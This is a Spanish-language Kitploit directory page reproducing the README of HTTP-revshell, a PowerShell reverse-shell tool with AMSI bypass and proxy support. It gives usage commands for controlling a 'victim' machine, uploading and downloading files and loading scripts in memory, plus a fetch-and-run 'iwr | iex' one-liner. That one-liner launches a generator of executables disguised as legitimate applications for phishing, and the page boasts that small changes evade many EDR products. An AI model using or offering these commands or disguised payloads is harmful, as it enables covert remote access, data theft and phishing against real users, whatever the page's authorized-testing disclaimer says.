Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
HTTP-revshell — Powershell reverse shell utilizando protocolo HTTP/S con bypass de AMSI y soporte para proxy | Kitploit
Herramientas/GitHubGitHub/3v4si0n/http-revshell
Herramientas de PhishingGeneración de PayloadsEvasión de IDS/IPSPost-ExplotaciónComando y ControlRed TeamingHerramienta de Acceso Remoto
GitHub3v4si0n/http-revshell

HTTP-revshell

Powershell reverse shell utilizando protocolo HTTP/S con bypass de AMSI y soporte para proxy

Ver Repositorio
59890hace 1 añoRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Shell inversa HTTP/S en Powershell

Category-tool Powershell Python License

HTTP-revshell es una herramienta enfocada en ejercicios de redteam y pentesters. Esta herramienta proporciona una conexión inversa a través del protocolo HTTP/S. Utiliza un canal encubierto para obtener control sobre la máquina víctima mediante peticiones web y así eludir soluciones como IDS, IPS y AV.

NOTA: La herramienta no se mantendrá en términos de evasión. Con unos pocos cambios puedes evadir muchos EDR del mercado.

HTTP-revshell

Ayuda de server.py

Uso del servidor:

root@kitploit:~
usage: server.py [-h] [--ssl] [--autocomplete] host port

positional arguments:
  host            Listen Host
  port            Listen Port

optional arguments:
  -h, --help      show this help message and exit
  --ssl           Send traffic over ssl
  --autocomplete  Autocomplete powershell functions

Ayuda de Invoke-WebRev.ps1 (cliente)

Uso del cliente:

root@kitploit:~
Import-Module .\Invoke-WebRev.ps1
Invoke-WebRev -ip IP -port PORT [-ssl]

Instalación

root@kitploit:~
git clone https://github.com/3v4Si0N/HTTP-revshell.git
cd HTTP-revshell/
pip3 install -r requirements.txt

Características

  • SSL
  • Consciente de proxy
  • Subir archivos
  • Descargar archivos
  • Cargar scripts de PowerShell a través del servidor
  • Control de errores
  • Bypass de AMSI
  • Autocompletar funciones de PowerShell (opcional)

Uso de funciones adicionales

Subir

Esta función permite subir cualquier archivo a la máquina víctima.

Uso:

root@kitploit:~
upload /src/path/file C:\dest\path\file

Descargar

Esta función permite descargar un archivo a la máquina atacante.

Uso:

root@kitploit:~
download C:\src\path\file /dst/path/file

Loadps1

Esta función permite cargar scripts de PowerShell sin tener que escribir en el disco de la víctima, leyendo el archivo a través de tráfico HTTP legítimo.

Uso:

root@kitploit:~
loadps1 /path/to/the/local/server/PowershellScript.ps1

Ayuda de Revshell-Generator.ps1 (Generador automático de payloads)

Este script permite crear un archivo ejecutable con el payload necesario para usar HTTP-revshell, solo necesitas seguir las instrucciones en pantalla para generarlo. Hay 6 plantillas predefinidas y una personalizable, con los datos que prefieras.

Los payloads generados por la herramienta incorporan el icono legítimo de la aplicación, así como la información de producto y copyright de la aplicación original. Además, cada uno abre la aplicación original antes de establecer la conexión con el servidor, simulando ser una aplicación legítima. Esto puede usarse para phishing o ejercicios de Red Team.

Uso del generador de payloads:

root@kitploit:~
powershell "iwr -useb https://raw.githubusercontent.com/3v4Si0N/HTTP-revshell/master/Revshell-Generator.ps1 | iex"

Revshell-Generator

IMPORTANTE: Todos los campos en las plantillas predefinidas se autocompletan al presionar la tecla enter.

Créditos

  • JoelGMSec por su increíble Revshell-Generator.ps1. Twitter: @JoelGMSec
  • dev-2null por reportar el primer error. Twitter: @dev2null

Aviso legal y licencia

Este script está licenciado bajo LGPLv3+. Enlace directo a la Licencia.

HTTP-revshell debe usarse únicamente para pruebas de penetración autorizadas y/o fines educativos sin ánimo de lucro. Cualquier uso indebido de este software no será responsabilidad del autor ni de ningún otro colaborador. Úsalo en tus propios servidores y/o con permiso del propietario del servidor.

Descargar herramienta